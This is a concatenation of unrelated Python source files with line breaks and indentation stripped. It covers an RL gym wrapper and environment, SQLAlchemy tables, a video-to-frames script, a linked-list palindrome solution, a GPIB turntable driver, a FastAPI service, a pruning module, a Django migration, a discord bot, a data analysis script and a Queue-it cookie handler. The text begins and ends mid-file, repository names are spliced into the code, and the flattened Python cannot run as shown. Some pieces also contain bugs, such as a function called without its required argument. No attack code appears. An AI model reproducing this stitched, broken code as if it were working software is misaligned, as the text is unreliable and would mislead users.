self.session.before_step(action) ob, rew, done, info = self.env.step(action) self.session.after_step(ob, rew, done, info, action) # save session stats cur_time = time.time() if done or (((cur_time - self.last_summary_flush) > self.flush_interval_secs)): if self.session: self.session.save_summary() self.last_summary_flush = cur_time return ob, rew, done, info def is_complete(self): return self.session.is_complete() def close(self): self.env.close() self.session.close() from SBaaS_base.postgresql_orm_base import * class data_stage01_quantification_physiologicalRatios_replicates(Base): __tablename__ = 'data_stage01_quantification_physiologicalRatios_replicates' id = Column(Integer, Sequence('data_stage01_quantification_physiologicalRatios_replicates_id_seq'), primary_key=True) experiment_id = Column(String(50)) sample_name_short = Column(String(100)) #sample_name_abbreviation = Column(String(100)) #add in at some-point time_point = Column(String(10)) physiologicalratio_id = Column(String(50)) physiologicalratio_name = Column(String(100)) physiologicalratio_value = Column(Float) physiologicalratio_description = Column(String(500)) used_ = Column(Boolean); comment_ = Column(Text); __table_args__ = (UniqueConstraint('experiment_id','sample_name_short','time_point','physiologicalratio_id'), ) def __init__(self, row_dict_I, ): self.time_point=row_dict_I['time_point']; self.physiologicalratio_name=row_dict_I['physiologicalratio_name']; self.physiologicalratio_value=row_dict_I['physiologicalratio_value']; self.physiologicalratio_description=row_dict_I['physiologicalratio_description']; self.used_=row_dict_I['used_']; self.comment_=row_dict_I['comment_']; self.id=row_dict_I['id']; self.experiment_id=row_dict_I['experiment_id']; self.sample_name_short=row_dict_I['sample_name_short']; self.physiologicalratio_id=row_dict_I['physiologicalratio_id']; def __set__row__(self, experiment_id_I, sample_name_short_I, #sample_name_abbreviation_I, time_point_I, #time_point_units_I, physiologicalratio_id_I, physiologicalratio_name_I, physiologicalratio_value_I, physiologicalratio_description_I, used__I, comment__I): self.experiment_id=experiment_id_I self.sample_name_short=sample_name_short_I #self.sample_name_abbreviation = sample_name_abbreviation_I; self.time_point=time_point_I self.physiologicalratio_id=physiologicalratio_id_I self.physiologicalratio_name=physiologicalratio_name_I self.physiologicalratio_value=physiologicalratio_value_I self.physiologicalratio_description=physiologicalratio_description_I self.used_=used__I self.comment_=comment__I def __repr__(self): return "data_stage01_quantification_physiologicalRatios_replicates: %s, %s, %s" % (self.experiment_id, self.sample_name_short, self.physiologicalratio_id) def __repr__dict__(self): return {'id':self.id, 'experiment_id':self.experiment_id, 'sample_name_short':self.sample_name_short, #'sample_name_abbreviation':self.sample_name_abbreviation, 'time_point':self.time_point, 'physiologicalratio_id':self.physiologicalratio_id, 'physiologicalratio_name':self.physiologicalratio_name, 'physiologicalratio_value':self.physiologicalratio_value, 'physiologicalratio_description':self.physiologicalratio_description, 'used_':self.used_, 'comment_':self.comment_} def __repr__json__(self): return json.dumps(self.__repr__dict__()) class data_stage01_quantification_physiologicalRatios_averages(Base): __tablename__ = 'data_stage01_quantification_physiologicalRatios_averages' id = Column(Integer, 
Sequence('data_stage01_quantification_physiologicalRatios_averages_id_seq'), primary_key=True) experiment_id = Column(String(50)) sample_name_abbreviation = Column(String(100)) time_point = Column(String(10)) physiologicalratio_id = Column(String(50)) physiologicalratio_name = Column(String(100)) physiologicalratio_value_ave = Column(Float) physiologicalratio_value_cv = Column(Float) physiologicalratio_value_lb = Column(Float) physiologicalratio_value_ub = Column(Float) physiologicalratio_description = Column(String(500)) used_ = Column(Boolean); comment_ = Column(Text); __table_args__ = (UniqueConstraint('experiment_id','sample_name_abbreviation','time_point','physiologicalratio_id'), ) def __init__(self, row_dict_I, ): self.physiologicalratio_name=row_dict_I['physiologicalratio_name']; self.physiologicalratio_value_ave=row_dict_I['physiologicalratio_value_ave']; self.physiologicalratio_value_cv=row_dict_I['physiologicalratio_value_cv']; self.comment_=row_dict_I['comment_']; self.physiologicalratio_description=row_dict_I['physiologicalratio_description']; self.used_=row_dict_I['used_']; self.physiologicalratio_value_ub=row_dict_I['physiologicalratio_value_ub']; self.id=row_dict_I['id']; self.physiologicalratio_value_lb=row_dict_I['physiologicalratio_value_lb']; self.experiment_id=row_dict_I['experiment_id']; self.sample_name_abbreviation=row_dict_I['sample_name_abbreviation']; self.time_point=row_dict_I['time_point']; self.physiologicalratio_id=row_dict_I['physiologicalratio_id']; def __set__row__(self,experiment_id_I, sample_name_abbreviation_I, time_point_I, physiologicalratio_id_I, physiologicalratio_name_I, physiologicalratio_value_ave_I, physiologicalratio_value_cv_I, physiologicalratio_value_lb_I, physiologicalratio_value_ub_I, physiologicalratio_description_I, used__I, comment__I): self.experiment_id=experiment_id_I self.sample_name_abbreviation=sample_name_abbreviation_I self.time_point=time_point_I self.physiologicalratio_id=physiologicalratio_id_I self.physiologicalratio_name=physiologicalratio_name_I self.physiologicalratio_value_ave=physiologicalratio_value_ave_I self.physiologicalratio_value_cv=physiologicalratio_value_cv_I self.physiologicalratio_value_lb=physiologicalratio_value_lb_I self.physiologicalratio_value_ub=physiologicalratio_value_ub_I self.physiologicalratio_description=physiologicalratio_description_I self.used_=used__I self.comment_=comment__I def __repr__(self): return "data_stage01_quantification_physiologicalRatios_averages: %s, %s, %s" % (self.experiment_id, self.sample_name_abbreviation, self.physiologicalratio_id) def __repr__dict__(self): return {'id':self.id, 'experiment_id':self.experiment_id, 'sample_name_abbreviation':self.sample_name_abbreviation, 'time_point':self.time_point, 'physiologicalratio_id':self.physiologicalratio_id, 'physiologicalratio_name':self.physiologicalratio_name, 'physiologicalratio_value_ave':self.physiologicalratio_value_ave, 'physiologicalratio_value_cv':self.physiologicalratio_value_cv, 'physiologicalratio_value_lb':self.physiologicalratio_value_lb, 'physiologicalratio_value_ub':self.physiologicalratio_value_ub, 'physiologicalratio_description':self.physiologicalratio_description, 'used_':self.used_, 'comment_':self.comment_} def __repr__json__(self): return json.dumps(self.__repr__dict__())computer_network/decode/Video2Picture/Video2Pic.py import cv2 from cv2 import VideoWriter, VideoWriter_fourcc, imread, resize import os from PIL import Image from encode1 import QR_code import sys img_root = os.getcwd() # 获取当前路径 def 
Video2Pic(videopath): videoPath = img_root + '/' + videopath # 读取视频路径 folder_name = 'output' # 定义新建文件夹名 if os.path.isdir(img_root): os.mkdir(os.path.join(img_root, folder_name)) # 新建文件 imgPath = img_root + "/output/" # 保存图片路径 cap = cv2.VideoCapture(videoPath) fps = cap.get(cv2.CAP_PROP_FPS) # 获取帧率 width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH)) # 获取宽度 height = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT)) # 获取高度 if not cap.isOpened(): # 是否成功打开 print("Please check the path.") frame_interval =9 frame_count = 0 cnt = 0 while 1: suc, frame = cap.read() cnt += 1 frame_count += 1 if not suc: break cv2.imwrite(imgPath + "%02d.png" % frame_count, frame) cv2.waitKey(1) print("视频转图片成功") cap.release() if __name__ == '__main__': a = QR_code() Video2Pic() from typing import Callable, Optional class ListNode: def __init__(self, val: int) -> None: self.val = val self.next: Optional[ListNode] = None def __repr__(self) -> str: return f'ListNode({self.val})' def create_node_list(values: list[int]) -> ListNode: """Creates a ListNode out of a list of values""" head = ListNode(values[0]) last_node = head for value in values[1:]: node = ListNode(value) last_node.next = node last_node = node return head class Solution: def isPalindrome(self, head: Optional[ListNode]) -> bool: slow = fast = head prev: Optional[ListNode] = None while fast is not None and fast.next is not None: fast = fast.next.next # Since fast is always ahead of slow, # slow.next is always < fast.next. So we can assume these two. assert slow is not None assert slow.next is not None # Same as doing: # old_prev = prev # prev = slow # slow = slow.next # prev.next = old_prev # All this is doing is forwarding both prev and slow 1 step, # While also reversing the list behind prev. prev, prev.next, slow = slow, prev, slow.next # For odd number of elements, prev will be 1 element behind the # middle element, while slow will be on the middle element. # So we want slow to move 1 element ahead, as middle element # is the same for both. if fast is not None: assert slow is not None slow = slow.next # Now, we have divided our list into two linked lists, # One, moving forwards from slow, # Two, moving backwards from prev. # All we need to do is confirm both have the same elements. while prev is not None: assert slow is not None if prev.val != slow.val: return False slow = slow.next prev = prev.next # Making sure the lengths of the two weren't mismatched. 
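# --- Hedged micro-example (not part of the original solution) ----------------
# The trickiest line above is the simultaneous assignment
# `prev, prev.next, slow = slow, prev, slow.next`: the right-hand side is
# evaluated first, then the targets are bound left to right, so one statement
# both advances `slow` and reverses the link behind it without a temporary.
_a, _b, _c = ListNode(1), ListNode(2), ListNode(3)
_a.next, _b.next = _b, _c
_prev, _slow = None, _a
_prev, _prev.next, _slow = _slow, _prev, _slow.next
# `_prev` is now the old head with its link reversed; `_slow` moved one step.
assert _prev.val == 1 and _prev.next is None and _slow.val == 2
# -----------------------------------------------------------------------------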
return prev is None tests = [ ( ([1],), True, ), ( ([1, 2],), False, ), ( ([1, 2, 2, 1],), True, ), ( ([1, 2, 3, 4, 5],), False, ), ( ([1, 2, 3, 2, 1],), True, ), ( ([1, 2, 3, 2, 1, 1],), False, ), ] def validator( isPalindrome: Callable[[ListNode], bool], inputs: tuple[list[int]], expected: bool ) -> None: values, = inputs node_list = create_node_list(values) output = isPalindrome(node_list) assert output == expected, (output, expected) Ashkan-Agc/Moris-mano-cpu-assembler import struct from file_opr import write_file def compiler(object_dict, output_path, mode): header_list = list(object_dict.keys()) #sort dic keys header_list.sort() for memory_location in header_list: integer = int(object_dict[memory_location], 16) # update values to bin object_dict[memory_location] = struct.pack('>i', integer) write_file(output_path, header_list, object_dict, mode)Source_Code/Python/labinstrument/turntable/ETS2090/ETS2090.py from ...remote import * from ...interface import * import time class ETS2090(IConfigurable): ''' This instrment include 2 rotations, one is theta, the other is phi, so this init message should contain 2 gpib port ''' def __init__(self, theta_string, phi_string): self.theta = simpleETS2090(theta_string) self.phi = simpleETS2090(phi_string) def set_parameters(self, parameter: dict): self.theta.set_parameters(parameter['theta']) self.phi.set_parameters(parameter['phi']) def get_parameters(self) -> dict: return { "theta": self.theta.get_parameters(), "phi": self.phi.get_parameters() } class simpleETS2090(GPIB, IConfigurable): def __init__(self, *args, **kwargs): super(simpleETS2090, self).__init__(*args, **kwargs) def __set_lower_limit(self,value): self.write("CL {}".format(value)) def __set_upper_limit(self,value): self.write("WL {}".format(value)) def __get_lower_limit(self): return self.query("CL?") def __get_upper_limit(self): return self.query("WL?") def __get_speed(self): return self.query("S?") def __set_speed(self,value): self.write('S{}'.format(value)) def __set_mode(self,value): self.write('N{}'.format(value) if type(value) is int else value) def __get_mode(self): return self.query('LV?') def __set_current_position(self,value): self.write("CP {}".format(value)) def __get_current_position(self): return self.query('CP?') def __set_scan_count(self,value): self.write("CY {}".format(value)) def __get_scan_count(self): return self.query("WL?") def seek(self,value,timeout=200): #second self.write('SK {}'.format(value)) return self.wait_until_done(timeout) def seek_async(self,value,timeout=200): self.write('SK {}'.format(value)) def done(self): return self.OPC() def wait_until_done(self,timeout=200): time_start_stamp=float(datetime.datetime.now().timestamp()) while 1: if float(datetime.datetime.now().timestamp())-time_start_stamp>timeout: return 0 else: if self.OPC()=="1": return 1 else: time.sleep(0.1) def scan(self): self.write('SC') def is_scanning(self): self.query("SC?") def stop_scan(self): # !!! 
we should know how to stop the scanning pass def set_preset_speed(self,speed_index,speed): self.write("SS{} {}".format(speed_index,speed)) def get_preset_speed(self,speed_index): return self.query("SS{}?".format(speed_index)) def select_turntable_mode(self,instrument_type1,instrument_type2): # TT # NRM Normal turntable # AIR Air flotation turntable # TWO Two speed turntable # CONT continuous rotation turntable # NOCONT Non continuous rotation turntable self.write("TT {} {}".format(instrument_type1,instrument_type2)) def select_tower_mode(self,instrument_type1): # NRM Normal turntable # BOR Bore sight tower self.write("TWR {}".format(instrument_type1)) mode=property(__get_mode,__set_mode) speed=property(__get_speed,__set_speed) current_position = property(__get_current_position, __set_current_position) lower_limit = property(__get_lower_limit, __set_lower_limit) upper_limit = property(__get_upper_limit, __set_upper_limit) def set_parameters(self, parameter: dict): if "mode" in parameter: self.mode=parameter['mode'] if "speed" in parameter: self.speed=parameter['speed'] if "lower limit" in parameter: self.lower_limit=parameter['lower limit'] if "upper limit" in parameter: self.upper_limit=parameter['upper limit'] def get_parameters(self) -> dict: return { 'mode':self.mode, 'speed':self.speed, 'lower limit':self.lower_limit, 'upper limit':self.upper_limit, } if __name__ == '__main__': # init instrument # query idn # config status reporting # set numeric mode2 # verify current position # set sw limit as needed # set scan count, polarization, and any other desired motion related parameters # send gpib command for desired motion # wait for motion to complete # monitor current position as required # check for operation complete # repeat until motion complete # stop all devices pass 1-10 from Calculator.Calculator import Calculator from AdditionalModules.RandomNumberGenerator.One import one from AdditionalModules.RandomNumberGenerator.Two import two from AdditionalModules.RandomNumberGenerator.Three import three from AdditionalModules.RandomNumberGenerator.Four import four from AdditionalModules.RandomNumberGenerator.Five import five from AdditionalModules.RandomNumberGenerator.Six import six from AdditionalModules.RandomNumberGenerator.Seven import seven class RandomNumberGenerator(Calculator): # Generate a random number without a seed between a range of two numbers - Both Integer and Decimal def one(self, low, high): self.result = one(low, high) return self.result # Generate a random number with a seed between a range of two numbers - Both Integer and Decimal def two(self, low, high, seed_value): self.result = two(low, high, seed_value) return self.result # Generate a list of N random numbers with a seed and between a range of numbers - Both Integer and Decimal def three(self, length, seed_value): self.result = three(length, seed_value) return self.result # Select a random item from a list def four(self, data): self.result = four(data) return self.result # Set a seed and randomly select the same value from a list def five(self, data, seed_value): self.result = five(data, seed_value) return self.result # Select N number of items from a list without a seed def six(self, data, n): self.result = six(data, n) return self.result # Select N number of items from a list with a seed def seven(self, data, n, seed_value): self.result = seven(data, n, seed_value) return self.resultfrom MDSplus import Device,Data,TreeNode _device_list = None def _devHelpDevtype(devtype, full): from pydoc import TextDoc global 
_device_list if _device_list is None: alldevices=Data.execute('MDSDEVICES()') _device_list=[item[0].strip() for item in alldevices] if ('*' in devtype) or ('?' in devtype): devnames=[] for device in _device_list: if (Data.execute('MdsShr->StrMatchWild(descr($),descr($))',(device.upper(),devtype.upper())) & 1) == 1: devnames.append(DevHelp(device,-1)) return '\n'.join(devnames) else: try: cls = Device.PyDevice(devtype) if full == 1: return TextDoc().docclass(cls) elif full == -1: return "%s: python device" % devtype else: return cls.__doc__ except: for device in _device_list: if device.upper() == devtype.upper(): return "%s: tdi, java or shared library device" % device return "Error obtaining help on device " + devtype def _devHelpNode(node,full): try: elt = int(node.conglomerate_elt) if elt == 0: return "" if elt == 1: return DevHelp(node.record.model,full) else: cls = node.head.record.getDevice() return cls.parts[elt-2].get('help',"") except Exception as e: return "ERROR: %s"%(str(e),) def DevHelp(dev,full=0): if isinstance(dev,TreeNode): return _devHelpNode(dev,int(full)) else: return _devHelpDevtype(str(dev),int(full)) PKopel/IOT-Smartband from fastapi import FastAPI from pydantic import BaseModel import main # import logging app = FastAPI() # logging.basicConfig(level=logging.DEBUG) @app.get("/") async def read_root(): return {"Hello": "World"} @app.get("/all") async def test(): return main.open_csv() @app.get("/single_user_single_day/raw/{date}/{user}") async def single_user_single_day_raw(date, user): return main.single_user_single_day_raw(date, user) @app.get("/single_user_single_day/{date}/{user}") async def single_user_single_day(date, user): return main.single_user_single_day(date, user) @app.get("/all_users_by_day") async def all_users_by_day(): return main.all_users_by_day() @app.get("/all_users_for_day/{day}") async def all_users_for_day(day): return main.all_users_for_day(day) @app.get("/all_days_by_user") async def all_days_by_user(): return main.all_days_by_user() @app.get("/all_days_for_user/{user}") async def all_days_for_user(user): return main.all_days_for_user(user) DeNA/ChainerPruner10-100 # Copyright (c) 2018 DeNA Co., Ltd. 
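# --- Hedged usage sketch for the FastAPI service defined above ---------------
# (hypothetical driver; it assumes the module is importable as `server` and
# that its `main` backend can read the CSV data locally). FastAPI's test
# client exercises the routes without starting a real server.
from fastapi.testclient import TestClient
# from server import app  # hypothetical import path for the app above


def smoke_test(app):
    client = TestClient(app)
    response = client.get("/")
    assert response.status_code == 200
    assert response.json() == {"Hello": "World"}
# -----------------------------------------------------------------------------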
# Licensed under The MIT License [see LICENSE for details] import logging from chainerpruner.rebuild.calc_pruning_connection import calc_pruning_connection import chainerpruner from chainerpruner.rebuild.mapping import get_mapping logger = logging.getLogger(__name__) __passive_pruned = set() def passive_pruned_add(node): global __passive_pruned __passive_pruned.add(node) def passive_pruned_clear(): global __passive_pruned __passive_pruned.clear() def rebuild(model, graph, target_layers, mapping=None): """rebuild each weight Args: model: graph: target_layers: mapping: Returns: """ passive_pruned_clear() if not mapping: mapping = get_mapping(model) if len(target_layers) == 0: raise ValueError('invalid rebuild_info') pruning_connection_info = calc_pruning_connection(graph) if not pruning_connection_info: raise ValueError('pruinng_connection_info parse error') logger.debug('pruning_connection_info', pruning_connection_info) model_dict = {name: link for name, link in chainerpruner.utils.named_modules(model)} info = [] nodes = {node.name: node for node in graph.graph.nodes} pruned = set() count = 0 for name, post_names in pruning_connection_info.items(): if name not in target_layers: continue logger.debug('(active)%s: %s', name, post_names) # rebuild pruning target node target_link = model_dict[name] rebuild_link_class = mapping.get(type(target_link), None) # type: chainerpruner.rebuild.RebuildLink if rebuild_link_class is None: raise NotImplementedError('RebuildLink is not implemented.' 'This layer can not be pruning.' '{}: {}'.format(name, target_link)) rebuild_link = rebuild_link_class() rebuild_link.node = nodes[name] mask = rebuild_link.apply_active_rebuild(target_link) info.append({ 'name': name, 'before': len(mask), 'after': int(sum(mask)), }) # later node rebuild (input channels) for post_name in post_names: logger.debug('(passive)%s:', post_name) if post_name in pruned: continue target_link = model_dict[post_name] # passive rebuild済のノードはskipする # 例えばSEBlock(Linear, Linear)のようにUserDefinedChainのまとまりとして # in/outチャネルの整合性を保つ必要がある層がある # この場合、SEBlockのpassive rebuildのクラスをテーブルに追加しておき、 # SEBlockを構成するLinearのpassive rebuildはskipするようにする if target_link in __passive_pruned: continue rebuild_link_class = mapping.get(type(target_link), None) if rebuild_link_class is None: # ResBlockなどUserDefinedLinkを含む場合があるのでskip continue rebuild_link = rebuild_link_class() rebuild_link.node = nodes[post_name] rebuild_link.apply_passive_rebuild(target_link, mask) pruned.add(post_name) count += 1 if count == 0: logger.warning('rebuild layer not found') passive_pruned_clear() return info # Generated by Django 3.2.2 on 2021-06-01 06:34 import ckeditor_uploader.fields from django.conf import settings from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name="Tags", fields=[ ( "id", models.BigAutoField( auto_created=True, primary_key=True, serialize=False, verbose_name="ID", ), ), ("tag", models.CharField(max_length=220)), ], ), migrations.CreateModel( name="Post", fields=[ ( "id", models.BigAutoField( auto_created=True, primary_key=True, serialize=False, verbose_name="ID", ), ), ("title", models.CharField(max_length=256)), ("description", models.CharField(max_length=300)), ("text", ckeditor_uploader.fields.RichTextUploadingField()), ("created_on", models.DateTimeField(auto_now_add=True)), ( "slug", models.SlugField( blank=True, 
max_length=200, null=True, unique=True ), ), ("tags", models.ManyToManyField(to="forum.Tags")), ( "user", models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, related_name="posts", to=settings.AUTH_USER_MODEL, ), ), ], options={ "ordering": ["-created_on"], }, ), migrations.CreateModel( name="Comment", fields=[ ( "id", models.BigAutoField( auto_created=True, primary_key=True, serialize=False, verbose_name="ID", ), ), ("text", ckeditor_uploader.fields.RichTextUploadingField()), ("created_on", models.DateTimeField(auto_now_add=True)), ( "post", models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, related_name="comments", to="forum.post", ), ), ( "user", models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, related_name="comments", to=settings.AUTH_USER_MODEL, ), ), ], options={ "ordering": ["-created_on"], }, ), ] import random import discord import discord.ext.commands as commands def setup(bot): bot.add_cog(Music(bot)) class RandomAudio(discord.AudioSource): def read(self): print('read') return random.getrandbits(30720) | 0b11111111 class Music: def __init__(self, bot): self.bot = bot @commands.command() async def summon(self, ctx, *, channel: discord.VoiceChannel = None): if channel is None and not ctx.author.voice: raise commands.CommandError('You are not in a voice channel.') channel = channel or ctx.author.voice.channel if not ctx.voice_client: await channel.connect() else: await ctx.voice_client.move_to(channel) @commands.command() async def leave(self, ctx): await ctx.voice_client.disconnect() @commands.command() async def play(self, ctx, song): ctx.voice_client.play(discord.PCMAudio(f'music/{song}')) await ctx.send(ctx.voice_client.is_playing()) @commands.command() async def is_playing(self, ctx): await ctx.send(ctx.voice_client.is_playing())0 import codecs import csv import json from operator import itemgetter PROPS = ['num_fosas', 'num_cuerpos'] def analyze_national_per_year(): per_year = {year: {"year": year, "num_fosas": 0, "num_fosas_change": 0, "num_cuerpos": 0, "num_cuerpos_change": 0} for year in range(2006, 2017)} with codecs.open('data/processed-geojson/municipales-centroids.json', encoding='utf-8') as f: data = json.load(f) for feature in data['features']: properties = feature['properties'] for year in range(2006, 2017): for prop in PROPS: per_year[year][prop] += properties[prop + '_' + str(year)] for year in range(2007, 2017): for prop in PROPS: per_year[year][prop + '_change'] = (per_year[year][prop] - per_year[year - 1][prop]) / float(per_year[year - 1][prop]) * 100 with open('data/analysis/national-per-year.csv', 'w') as f: writer = csv.DictWriter(f, fieldnames=['year', 'num_fosas', 'num_fosas_change', 'num_cuerpos', 'num_cuerpos_change']) writer.writeheader() writer.writerows(per_year.values()) def analyze_per_municipality(): with codecs.open('src/data/mxstates.json', encoding='utf-8') as f: states = json.load(f) state_lookup = {row['state_code']: row for row in states} municipalities = [] with codecs.open('data/processed-geojson/municipales-centroids.json', encoding='utf-8') as f: data = json.load(f) for feature in data['features']: properties = feature['properties'] row = { 'state_code': properties['CVE_ENT'], 'state_name': state_lookup[properties['CVE_ENT']]['state_name'], 'municipality_code': properties['CVE_MUN'], 'municipality_name': properties['NOM_MUN'], } for prop in PROPS: total = 0 for year in range(2006, 2017): total += properties[prop + '_' + str(year)] row[prop + '_total'] = total municipalities.append(row) municipalities 
= sorted(municipalities, key=itemgetter('num_fosas_total'), reverse=True) with open('data/analysis/municipalities-counts.csv', 'w') as f: writer = csv.DictWriter(f, fieldnames=['state_code', 'state_name', 'municipality_code', 'municipality_name', 'num_fosas_total', 'num_cuerpos_total']) writer.writeheader() writer.writerows(municipalities) if __name__ == '__main__': analyze_national_per_year() analyze_per_municipality() # -*- coding: utf-7 -*- """An example setup.py""" try: from setuptools import setup except ImportError: from distutils.core import setup CONFIG = { 'description': 'My Toy Python Project', 'author': '', 'url': 'https://github.com/bheavner/python_toy', 'download_url': 'https://github.com/bheavner/python_toy', 'author_email': '', 'version': '0.1.0.dev1', 'install_requires': [], 'packages': ['toy'], 'scripts': [], 'name': 'python_toy' } setup(**CONFIG) from .queueit_helpers import QueueitHelpers from .models import Utils class UserInQueueStateCookieRepository: QUEUEIT_DATA_KEY = "QueueITAccepted-SDFrts345E-V3" def __init__(self, httpContextProvider): self.httpContextProvider = httpContextProvider @staticmethod def getCookieKey(eventId): return UserInQueueStateCookieRepository.QUEUEIT_DATA_KEY + '_' + eventId @staticmethod def __generateHash(eventId, queueId, fixedCookieValidityMinutes, redirectType, issueTime, secretKey): return QueueitHelpers.hmacSha256Encode( eventId + queueId + fixedCookieValidityMinutes + redirectType + issueTime, secretKey) @staticmethod def __createCookieValue(eventId, queueId, fixedCookieValidityMinutes, redirectType, secretKey): issueTime = Utils.toString( QueueitHelpers.getCurrentTime()) hashValue = UserInQueueStateCookieRepository.__generateHash( eventId, queueId, fixedCookieValidityMinutes, redirectType, issueTime, secretKey) fixedCookieValidityMinutesPart = "" if (not Utils.isNilOrEmpty(fixedCookieValidityMinutes)): fixedCookieValidityMinutesPart = "&FixedValidityMins=" + fixedCookieValidityMinutes cookieValue = "EventId=" + eventId + "&QueueId=" + queueId + fixedCookieValidityMinutesPart + "&RedirectType=" + redirectType + "&IssueTime=" + issueTime + "&Hash=" + hashValue return cookieValue @staticmethod def __getCookieNameValueMap(cookieValue): result = {} cookieNameValues = cookieValue.split("&") for item in cookieNameValues: arr = item.split("=") if (len(arr) == 2): result[arr[0]] = arr[1] return result @staticmethod def __isCookieValid(secretKey, cookieNameValueMap, eventId, cookieValidityMinutes, validateTime): try: if ("EventId" not in cookieNameValueMap): return False if ("QueueId" not in cookieNameValueMap): return False if ("RedirectType" not in cookieNameValueMap): return False if ("IssueTime" not in cookieNameValueMap): return False if ("Hash" not in cookieNameValueMap): return False fixedCookieValidityMinutes = "" if ("FixedValidityMins" in cookieNameValueMap): fixedCookieValidityMinutes = cookieNameValueMap[ "FixedValidityMins"] hashValue = UserInQueueStateCookieRepository.__generateHash( cookieNameValueMap["EventId"], cookieNameValueMap["QueueId"], fixedCookieValidityMinutes, cookieNameValueMap["RedirectType"], cookieNameValueMap["IssueTime"], secretKey) if (hashValue != cookieNameValueMap["Hash"]): return False if (eventId.upper() != cookieNameValueMap["EventId"].upper()): return False if (validateTime): validity = cookieValidityMinutes if (not Utils.isNilOrEmpty(fixedCookieValidityMinutes)): validity = int(fixedCookieValidityMinutes) expirationTime = int( cookieNameValueMap["IssueTime"]) + (validity * 60) if (expirationTime < 
QueueitHelpers.getCurrentTime()): return False return True except: return False def store(self, eventId, queueId, fixedCookieValidityMinutes, cookieDomain, redirectType, secretKey): cookieKey = UserInQueueStateCookieRepository.getCookieKey(eventId) cookieValue = UserInQueueStateCookieRepository.__createCookieValue( eventId, queueId, Utils.toString(fixedCookieValidityMinutes), redirectType, secretKey) self.httpContextProvider.setCookie( cookieKey, cookieValue, QueueitHelpers.getCookieExpirationDate(), cookieDomain) def getState(self, eventId, cookieValidityMinutes, secretKey, validateTime): try: cookieKey = UserInQueueStateCookieRepository.getCookieKey(eventId) if (self.httpContextProvider.getCookie(cookieKey) is None): return StateInfo(False, False, None, None, None) cookieNameValueMap = UserInQueueStateCookieRepository.__getCookieNameValueMap( self.httpContextProvider.getCookie(cookieKey)) if (not UserInQueueStateCookieRepository.__isCookieValid( secretKey, cookieNameValueMap, eventId, cookieValidityMinutes, validateTime)): return StateInfo(True, False, None, None, None) fixedCookieValidityMinutes = None if ("FixedValidityMins" in cookieNameValueMap): fixedCookieValidityMinutes = int( cookieNameValueMap["FixedValidityMins"]) return StateInfo(True, True, cookieNameValueMap["QueueId"], fixedCookieValidityMinutes, cookieNameValueMap["RedirectType"]) except: return StateInfo(True, False, None, None, None) def cancelQueueCookie(self, eventId, cookieDomain): cookieKey = UserInQueueStateCookieRepository.getCookieKey(eventId) self.httpContextProvider.setCookie(cookieKey, None, -1, cookieDomain) def reissueQueueCookie(self, eventId, cookieValidityMinutes, cookieDomain, secretKey): cookieKey = UserInQueueStateCookieRepository.getCookieKey(eventId) cookieValue = self.httpContextProvider.getCookie(cookieKey) if (cookieValue == None): return cookieNameValueMap = UserInQueueStateCookieRepository.__getCookieNameValueMap( cookieValue) if (not UserInQueueStateCookieRepository.__isCookieValid( secretKey, cookieNameValueMap, eventId, cookieValidityMinutes, True)): return fixedCookieValidityMinutes = "" if ("FixedValidityMins" in cookieNameValueMap): fixedCookieValidityMinutes = cookieNameValueMap[ "FixedValidityMins"] cookieValue = UserInQueueStateCookieRepository.__createCookieValue( eventId, cookieNameValueMap["QueueId"], fixedCookieValidityMinutes, cookieNameValueMap["RedirectType"], secretKey) self.httpContextProvider.setCookie( cookieKey, cookieValue, QueueitHelpers.getCookieExpirationDate(), cookieDomain) class StateInfo: def __init__(self, isFound, isValid, queueId, fixedCookieValidityMinutes, redirectType): self.isFound = isFound self.isValid = isValid self.queueId = queueId self.fixedCookieValidityMinutes = fixedCookieValidityMinutes self.redirectType = redirectType def isStateExtendable(self): return self.isValid and Utils.isNilOrEmpty( self.fixedCookieValidityMinutes) import gym from gym import spaces, logger from gym.utils import seeding import numpy as np from action_space import ActionSpace from state_space import StateSpace from gym.spaces import Discrete from ST import SecondTransmitor class BackscatterEnv3(gym.Env): TIME_FRAME = 10 BUSY_TIMESLOT = 4 DATA_RATE = 0.3 def __init__(self): # System parameters self.nb_ST = 3 self.state_size = 2 * self.nb_ST self.nb_actions = (BackscatterEnv3.BUSY_TIMESLOT+1) ** 3 * (BackscatterEnv3.TIME_FRAME - BackscatterEnv3.BUSY_TIMESLOT+1)**2 self.action_space = ActionSpace((Discrete(BackscatterEnv3.BUSY_TIMESLOT+1), Discrete(BackscatterEnv3.BUSY_TIMESLOT+1), 
Discrete(BackscatterEnv3.BUSY_TIMESLOT + 1), Discrete(BackscatterEnv3.TIME_FRAME - BackscatterEnv3.BUSY_TIMESLOT + 1), Discrete(BackscatterEnv3.TIME_FRAME - BackscatterEnv3.BUSY_TIMESLOT+1))) self.observation_space = StateSpace((Discrete(SecondTransmitor.QUEUE), Discrete(SecondTransmitor.ENERGY), Discrete(SecondTransmitor.QUEUE), Discrete(SecondTransmitor.ENERGY), Discrete(SecondTransmitor.QUEUE), Discrete(SecondTransmitor.ENERGY))) # initialize Second Transmitters self.ST1 = SecondTransmitor(data_rate=BackscatterEnv3.DATA_RATE) self.ST2 = SecondTransmitor(data_rate=BackscatterEnv3.DATA_RATE) self.ST3 = SecondTransmitor(data_rate=BackscatterEnv3.DATA_RATE) self.viewer = None self.state = None self.steps_beyond_done = None def seed(self, seed=None): self.np_random, seed = seeding.np_random(seed) return [seed] def step(self, action): assert self.action_space.contains(action), "%r (%s) invalid"%(action, type(action)) harvest = action[0] backscatter_time_1 = action[1] backscatter_time_2 = action[2] transmit_time_1 = action[3] transmit_time_2 = action[4] backscatter_time_3 = BackscatterEnv3.BUSY_TIMESLOT - harvest - backscatter_time_1 - backscatter_time_2 transmit_time_3 = BackscatterEnv3.TIME_FRAME - BackscatterEnv3.BUSY_TIMESLOT - transmit_time_1 - transmit_time_2 reward = 0 if((backscatter_time_3 >= 0) and (transmit_time_3 >= 0)): harvest_time_1 = BackscatterEnv3.BUSY_TIMESLOT - backscatter_time_1 harvest_time_2 = BackscatterEnv3.BUSY_TIMESLOT - backscatter_time_2 harvest_time_3 = BackscatterEnv3.BUSY_TIMESLOT - backscatter_time_3 reward += self.ST1.update(harvest_time_1, backscatter_time_1, 